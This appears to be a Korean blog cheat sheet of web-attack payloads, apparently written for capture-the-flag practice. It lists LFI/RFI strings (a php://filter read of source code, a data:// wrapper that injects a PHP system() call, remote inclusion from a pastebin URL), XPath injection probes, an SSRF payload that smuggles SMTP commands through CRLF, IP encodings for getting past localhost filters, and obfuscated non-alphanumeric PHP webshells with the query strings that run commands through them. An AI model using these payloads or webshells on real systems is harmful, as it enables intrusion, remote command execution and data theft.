* 유용한 command

curl 'url' -H 'header: header' --data 'data=data'


* LFI & RFI

http://test/?page=php://filter/convert.base64-encode/resource=index.php

http://test/?page=php://filter/convert.base64-decode/resource=./upload/abcde

http://test/?page=data://text/plain,%3Cxmp%3E%3C?php%20system($_GET[%27x%27]);&x=ls%20-al

http://test/?page=http://pastebin.com/raw/abcd/?&x=ls%20-al


* Xpath Injection

' or substring(name(parent::*[position()=1]),1,1)='u

' or substring(name(//node()[position()=6]),1,1)='f

' or substring(//flag_fcad489d[position()=1],1,1)='f


* SSRF

https://127.0.0.2%0d%0aHELO 127.0.0.2%0aMAIL FROM: <A@B.C>%0aRCPT TO: <zairo@ruu.kr>%0aDATA%0aFROM: AAA@B.C%0aTO: zairo@ruu.kr%0aSUBJECT: give me the flag%0d%0a.%0d%0a%0aQUIT%0a:25/


bypass etc...

- 다양한 IP 우회 방법

http://127.0.0.1    =>    http://2130706433/

http://127.0.0.1    =>    http://0x7f000001/

http://127.0.0.1    =>    http://0x7f.0x00.0x00.0x01

http://127.0.0.1    =>    http://017700000001/

http://127.0.0.1    =>    http://0177.000.000.01/

http://127.0.0.1    =>    http://0/


* webshell

- non-alpha webshell

<?=$_='$<>/'^'{{{{';${$_}[_](${$_}[__]);

// $_= '$<>/' ^ '{{{{' ----> $_ = '_GET'
// ${_GET}[_](${_GET})[__];
// final <?=$_GET[_]($_GET[__])
// webshell.php?_=system&__=ls -al
// reference : https://ctftime.org/writeup/10429


<?=`{${~"����"}[_]}`;
// echo -ne '<?=`{${~"\xa0\xb8\xba\xab"}[_]}`;'
// ?_=ls -al
// reference : https://ctftime.org/writeup/10429


<?=`/???/??? ../*`;
// 19 bytes (cat all files from ../)
// reference : https://ctftime.org/writeup/10429


'TipNote > Web Tip' 카테고리의 다른 글

WEB Tip  (0) 2018.07.18
SQL INJECTION  (0) 2015.11.25

+ Recent posts